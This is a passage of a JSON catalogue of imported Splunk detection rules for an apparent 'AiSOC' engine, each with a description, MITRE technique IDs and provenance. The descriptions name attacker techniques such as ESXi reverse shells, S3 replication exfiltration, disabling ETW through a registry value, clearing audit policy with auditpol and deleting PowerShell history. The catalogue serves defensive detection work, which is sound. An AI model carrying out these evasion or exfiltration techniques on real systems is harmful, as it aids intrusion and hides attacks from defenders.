"license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_excel_spawning_microsoft_project_application.yml" } }, { "id": "splunk-security-content-ee8b16a4-118e-4dd7-af4b-835530415610", "type": "detection", "name": "ESXi Reverse Shell Patterns", "description": "This detection looks for reverse shell string patterns on an ESXi host, which may indicate that a threat actor is attempting to establish remote control over the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-reverse-shell-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ee8b16a4-118e-4dd7-af4b-835530415610", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_reverse_shell_patterns.yml" } }, { "id": "splunk-security-content-eeb432d6-2212-43b6-9e89-fcd753f7da4c", "type": "detection", "name": "AWS Exfiltration via Bucket Replication", "description": "The following analytic detects API calls to enable S3 bucket replication services. It leverages AWS CloudTrail logs to identify `PutBucketReplication` events, focusing on fields like `bucketName`, `ReplicationConfiguration.Rule.Destination.Bucket`, and user details. This activity is significant as it can indicate unauthorized data replication, potentially leading to data exfiltration. If confirmed malicious, attackers could replicate sensitive data to external accounts, leading to data breaches and compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-exfiltration-via-bucket-replication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eeb432d6-2212-43b6-9e89-fcd753f7da4c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_exfiltration_via_bucket_replication.yml" } }, { "id": "splunk-security-content-eec78cef-d4c8-4b35-8f5b-6922102a4a41", "type": "detection", "name": "Linux Auditd Virtual Disk File And Directory Discovery", "description": "The following analytic detects suspicious discovery of virtual disk files and directories, which may indicate an attacker's attempt to locate and access virtualized storage environments. Virtual disks can contain sensitive data or critical system configurations, and unauthorized discovery attempts could signify preparatory actions for data exfiltration or further compromise. By monitoring for unusual or unauthorized searches for virtual disk files and directories, this analytic helps identify potential reconnaissance activities, enabling security teams to respond promptly and safeguard against unauthorized access and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-virtual-disk-file-and-directory-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eec78cef-d4c8-4b35-8f5b-6922102a4a41", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_virtual_disk_file_and_directory_discovery.yml" } }, { "id": "splunk-security-content-ef3c5ef2-3f6d-4087-aa75-49bf746dc907", "type": "detection", "name": "Windows WMI Process And Service List", "description": "The following analytic identifies suspicious WMI command lines querying for running processes or services. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific process and command-line events. This activity is significant as adversaries often use WMI to gather system information and identify services on compromised machines. If confirmed malicious, this behavior could allow attackers to map out the system, identify critical services, and plan further attacks, potentially leading to privilege escalation or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmi-process-and-service-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ef3c5ef2-3f6d-4087-aa75-49bf746dc907", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmi_process_and_service_list.yml" } }, { "id": "splunk-security-content-ef4c3f20-d1ad-4ad1-a3f4-d5f391c005fe", "type": "detection", "name": "O365 Multiple Service Principals Created by SP", "description": "The following analytic identifies instances where a single service principal creates more than three unique OAuth applications within a 10-minute timeframe. It leverages O365 logs from the Unified Audit Log, focusing on the 'Add service principal' operation in the Office 365 Azure Active Directory environment. This activity is significant as it may indicate a compromised or malicious service principal attempting to expand control or access within the network. If confirmed malicious, this could lead to unauthorized access and potential lateral movement within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-service-principals-created-by-sp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ef4c3f20-d1ad-4ad1-a3f4-d5f391c005fe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_service_principals_created_by_sp.yml" } }, { "id": "splunk-security-content-efbcf8ee-bc75-47f1-8985-a5c638c4faf0", "type": "detection", "name": "Windows MSHTA Writing to World Writable Path", "description": "The following analytic identifies instances of `mshta.exe` writing files to world-writable directories. It leverages Sysmon EventCode 11 logs to detect file write operations by `mshta.exe` to directories like `C:\\Windows\\Tasks` and `C:\\Windows\\Temp`. This activity is significant as it often indicates an attempt to establish persistence or execute malicious code, deviating from the utility's legitimate use. If confirmed malicious, this behavior could lead to the execution of multi-stage payloads, potentially resulting in full system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mshta-writing-to-world-writable-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "efbcf8ee-bc75-47f1-8985-a5c638c4faf0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mshta_writing_to_world_writable_path.yml" } }, { "id": "splunk-security-content-efc25501-4e75-4075-8cc5-ac80f2847d80", "type": "detection", "name": "Windows Firewall Rule Added", "description": "This detection identifies instances where a Windows Firewall rule is added by monitoring Event ID 4946 in the Windows Security Event Log. Firewall rule modifications can indicate legitimate administrative actions, but they may also signal unauthorized changes, misconfigurations, or malicious activity such as attackers allowing traffic for backdoors or persistence mechanisms. By analyzing fields like RuleName, RuleId, Computer, and ProfileChanged, security teams can determine whether the change aligns with expected behavior. Correlating with user activity and process execution can help distinguish false positives from real threats, ensuring better visibility into potential security risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-firewall-rule-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "efc25501-4e75-4075-8cc5-ac80f2847d80", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_firewall_rule_added.yml" } }, { "id": "splunk-security-content-efebf0c4-dcf4-496f-85a2-5ab7ad8fa876", "type": "detection", "name": "Kubernetes Shell Running on Worker Node", "description": "The following analytic identifies shell activity within the Kubernetes privilege scope on a worker node. It leverages process metrics from an OTEL collector hostmetrics receiver, specifically process.cpu.utilization and process.memory.utilization, pulled from Splunk Observability Cloud. This activity is significant as unauthorized shell processes can indicate potential security threats, providing attackers an entry point to compromise the node and the entire Kubernetes cluster. If confirmed malicious, this activity could lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks, severely compromising the cluster's security and integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-shell-running-on-worker-node.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "efebf0c4-dcf4-496f-85a2-5ab7ad8fa876", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_shell_running_on_worker_node.yml" } }, { "id": "splunk-security-content-eff7919a-8330-11eb-83f8-acde48001122", "type": "detection", "name": "Ransomware Notes bulk creation", "description": "The following analytic identifies the bulk creation of ransomware notes (e.g., .txt, .html, .hta files) on an infected machine. It leverages Sysmon EventCode 11 to detect multiple instances of these file types being created within a short time frame. This activity is significant as it often indicates an active ransomware attack, where the attacker is notifying the victim of the encryption. If confirmed malicious, this behavior could lead to widespread data encryption, rendering critical files inaccessible and potentially causing significant operational disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ransomware-notes-bulk-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eff7919a-8330-11eb-83f8-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ransomware_notes_bulk_creation.yml" } }, { "id": "splunk-security-content-f02b64b8-cbea-4f75-bf77-7a05111566b1", "type": "detection", "name": "Windows Office Product Spawned Child Process For Download", "description": "The following analytic identifies Office applications spawning child processes to download content via HTTP/HTTPS. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where Office applications like Word or Excel initiate network connections, excluding common browsers. This activity is significant as it often indicates the use of malicious documents to execute living-off-the-land binaries (LOLBins) for payload delivery. If confirmed malicious, this behavior could lead to unauthorized code execution, data exfiltration, or further malware deployment, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-spawned-child-process-for-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f02b64b8-cbea-4f75-bf77-7a05111566b1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_spawned_child_process_for_download.yml" } }, { "id": "splunk-security-content-f0306acf-a6ab-437a-bbc6-8628f8d5c97e", "type": "detection", "name": "Windows Steal Authentication Certificates - ESC1 Authentication", "description": "The following analytic detects when a suspicious certificate with a Subject Alternative Name (SAN) is issued using Active Directory Certificate Services (AD CS) and then immediately used for authentication. This detection leverages Windows Security Event Logs, specifically EventCode 4887, to identify the issuance and subsequent use of the certificate. This activity is significant because improperly configured certificate templates can be exploited for privilege escalation and environment compromise. If confirmed malicious, an attacker could gain unauthorized access, escalate privileges, and potentially compromise the entire environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649", "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-esc1-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f0306acf-a6ab-437a-bbc6-8628f8d5c97e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates___esc1_authentication.yml" } }, { "id": "splunk-security-content-f03355e0-28b5-4e9b-815a-6adffc63b38c", "type": "detection", "name": "Windows Rundll32 WebDav With Network Connection", "description": "The following analytic detects the execution of rundll32.exe with command-line arguments loading davclnt.dll and the davsetcookie function to access a remote WebDav instance. It uses data from Endpoint Detection and Response (EDR) agents, correlating process execution and network traffic data. This activity is significant as it may indicate exploitation of CVE-2023-23397, a known vulnerability. If confirmed malicious, this could allow an attacker to establish unauthorized remote connections, potentially leading to data exfiltration or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-webdav-with-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f03355e0-28b5-4e9b-815a-6adffc63b38c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_webdav_with_network_connection.yml" } }, { "id": "splunk-security-content-f067f7cf-f41b-4a60-985e-c23e268a13cb", "type": "detection", "name": "Windows Audit Policy Cleared via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/clear\" command-line argument used to clears the audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-cleared-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f067f7cf-f41b-4a60-985e-c23e268a13cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_cleared_via_auditpol.yml" } }, { "id": "splunk-security-content-f0c9d62f-a232-4edd-b17e-bc409fb133d4", "type": "detection", "name": "Domain Group Discovery With Dsquery", "description": "The following analytic identifies the execution of `dsquery.exe` with command-line arguments used to query for domain groups. It leverages Endpoint Detection and Response (EDR) data, focusing on process names and command-line arguments. This activity is significant because both Red Teams and adversaries use `dsquery.exe` to enumerate domain groups, gaining situational awareness and facilitating further Active Directory discovery. If confirmed malicious, this behavior could allow attackers to map out the domain structure, identify high-value targets, and plan subsequent attacks, potentially leading to privilege escalation or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-group-discovery-with-dsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f0c9d62f-a232-4edd-b17e-bc409fb133d4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_group_discovery_with_dsquery.yml" } }, { "id": "splunk-security-content-f0db4464-55d9-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious microsoft workflow compiler rename", "description": "The following analytic detects the renaming of microsoft.workflow.compiler.exe, a rarely used executable typically located in C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319. This detection leverages Endpoint Detection and Response (EDR) data, focusing on process names and original file names. This activity is significant because renaming this executable can indicate an attempt to evade security controls. If confirmed malicious, an attacker could use this renamed executable to execute arbitrary code, potentially leading to privilege escalation or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-microsoft-workflow-compiler-rename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f0db4464-55d9-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml" } }, { "id": "splunk-security-content-f0eacfa4-d33f-11eb-8f9d-acde48001122", "type": "detection", "name": "Disable ETW Through Registry", "description": "The following analytic detects modifications to the registry that disable the Event Tracing for Windows (ETW) feature. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled\" with a value set to \"0x00000000\". This activity is significant because disabling ETW can allow attackers to evade detection mechanisms, making it harder for security tools to monitor malicious activities. If confirmed malicious, this could enable attackers to execute payloads with minimal alerts, impairing defenses and potentially leading to further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-etw-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f0eacfa4-d33f-11eb-8f9d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_etw_through_registry.yml" } }, { "id": "splunk-security-content-f122cb2e-d773-4f11-8399-62a3572d8dd7", "type": "detection", "name": "Windows Unusual Count Of Invalid Users Fail To Auth Using Kerberos", "description": "The following analytic identifies a source endpoint failing to authenticate with multiple invalid domain users using the Kerberos protocol. It leverages Event ID 4768, which is generated when the Key Distribution Center issues a Kerberos Ticket Granting Ticket (TGT) and detects failure code 0x6, indicating the user is not found in the Kerberos database. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. If confirmed malicious, this activity could lead to unauthorized access and potential privilege escalation within the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-invalid-users-fail-to-auth-using-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f122cb2e-d773-4f11-8399-62a3572d8dd7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_invalid_users_fail_to_auth_using_kerberos.yml" } }, { "id": "splunk-security-content-f12b81e6-2fa2-48e0-95cd-f5f7e4d9ac89", "type": "detection", "name": "Windows Bluetooth Service Installed From Uncommon Location", "description": "Identifies the creation of a Windows service named \"BluetoothService\" with a binary path in user-writable directories, particularly %AppData%\\Bluetooth.\nThis technique was observed in the Lotus Blossom Chrysalis backdoor campaign, where attackers created a service named \"BluetoothService\" pointing to a malicious binary (renamed Bitdefender Submission Wizard) in a hidden AppData directory.\nWhile legitimate Bluetooth services exist in Windows, they are system services with binaries in System32.\nAny BluetoothService created with a binary path in user directories (AppData, Temp, Downloads) is highly suspicious and indicates potential malware persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bluetooth-service-installed-from-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f12b81e6-2fa2-48e0-95cd-f5f7e4d9ac89", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bluetooth_service_installed_from_uncommon_location.yml" } }, { "id": "splunk-security-content-f1369394-48e1-4327-bf6d-14377f4b8687", "type": "detection", "name": "Windows Powershell History File Deletion", "description": "The following analytic detects the usage of PowerShell to delete its command history file, which may indicate an attempt to evade detection by removing evidence of executed commands. PowerShell stores command history in ConsoleHost_history.txt under the user\u2019s profile directory. Adversaries or malicious scripts may delete this file using Remove-Item, del, or similar commands. This detection focuses on file deletion events targeting the history file, correlating them with recent PowerShell activity. While legitimate users may occasionally clear history, frequent or automated deletions should be investigated for potential defense evasion or post-exploitation cleanup activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-history-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f1369394-48e1-4327-bf6d-14377f4b8687", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_history_file_deletion.yml" } }, { "id": "splunk-security-content-f1483f5e-ee29-11eb-9d23-acde48001122", "type": "detection", "name": "Rundll32 DNSQuery", "description": "The following analytic detects a suspicious `rundll32.exe` process making HTTP connections and performing DNS queries to web domains. It leverages Sysmon EventCode 22 logs to identify these activities. This behavior is significant as it is commonly associated with IcedID malware, where `rundll32.exe` checks internet connectivity and communicates with C&C servers to download configurations and other components. If confirmed malicious, this activity could allow attackers to establish persistence, download additional payloads, and exfiltrate sensitive data, posing a severe threat to the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-dnsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f1483f5e-ee29-11eb-9d23-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/rundll32_dnsquery.yml" } }, { "id": "splunk-security-content-f164bc6f-ecbe-45e0-aaa6-f5c4d8c84b9a", "type": "detection", "name": "Windows TOR Client Execution", "description": "The following analytic detects the execution of the TOR Browser and related TOR components on Windows endpoints by monitoring process creation activity.\nAdversaries and insider threats leverage TOR to anonymize command-and-control traffic, facilitate data exfiltration, and evade network monitoring and policy enforcement.\nWhile TOR can be used for legitimate research and privacy purposes, its presence on enterprise endpoints is often unusual and should be investigated to determine intent, scope, and any associated malicious behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-tor-client-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f164bc6f-ecbe-45e0-aaa6-f5c4d8c84b9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_tor_client_execution.yml" } }, { "id": "splunk-security-content-f19e09b0-9308-11eb-b7ec-acde48001122", "type": "detection", "name": "AWS IAM Assume Role Policy Brute Force", "description": "The following analytic detects multiple failed attempts to assume an AWS IAM role, indicating a potential brute force attack. It leverages AWS CloudTrail logs to identify `MalformedPolicyDocumentException` errors with a status of `failure` and filters out legitimate AWS services. This activity is significant as repeated failures to assume roles can indicate an adversary attempting to guess role names, which is a precursor to unauthorized access. If confirmed malicious, this could lead to unauthorized access to AWS resources, potentially compromising sensitive data and services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1580", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-iam-assume-role-policy-brute-force.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f19e09b0-9308-11eb-b7ec-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_iam_assume_role_policy_brute_force.yml" } }, { "id": "splunk-security-content-f1c07594-a141-11eb-8407-acde48001122", "type": "detection", "name": "DLLHost with no Command Line Arguments with Network", "description": "The following analytic detects instances of DLLHost.exe running without\ncommand line arguments while establishing a network connection.\nThis behavior is identified using Endpoint Detection and Response (EDR) telemetry,\nfocusing on process execution and network activity data.\nIt is significant because DLLHost.exe typically runs with specific arguments,\nand its absence can indicate malicious activity, such as Cobalt Strike usage.\nIf confirmed malicious, this activity could allow attackers to execute code,\nmove laterally, or exfiltrate data, posing a severe threat to the network's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dllhost-with-no-command-line-arguments-with-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f1c07594-a141-11eb-8407-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml" } }, { "id": "splunk-security-content-f2132d74-cf81-4c5e-8799-ab069e67dc9f", "type": "detection", "name": "AWS AMI Attribute Modification for Exfiltration", "description": "The following analytic detects suspicious modifications to AWS AMI attributes, such as sharing an AMI with another AWS account or making it publicly accessible. It leverages AWS CloudTrail logs to identify these changes by monitoring specific API calls. This activity is significant because adversaries can exploit these modifications to exfiltrate sensitive data stored in AWS resources. If confirmed malicious, this could lead to unauthorized access and potential data breaches, compromising the confidentiality and integrity of organizational information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ami-attribute-modification-for-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2132d74-cf81-4c5e-8799-ab069e67dc9f", "source_commit": "4d4c7ee", "license": 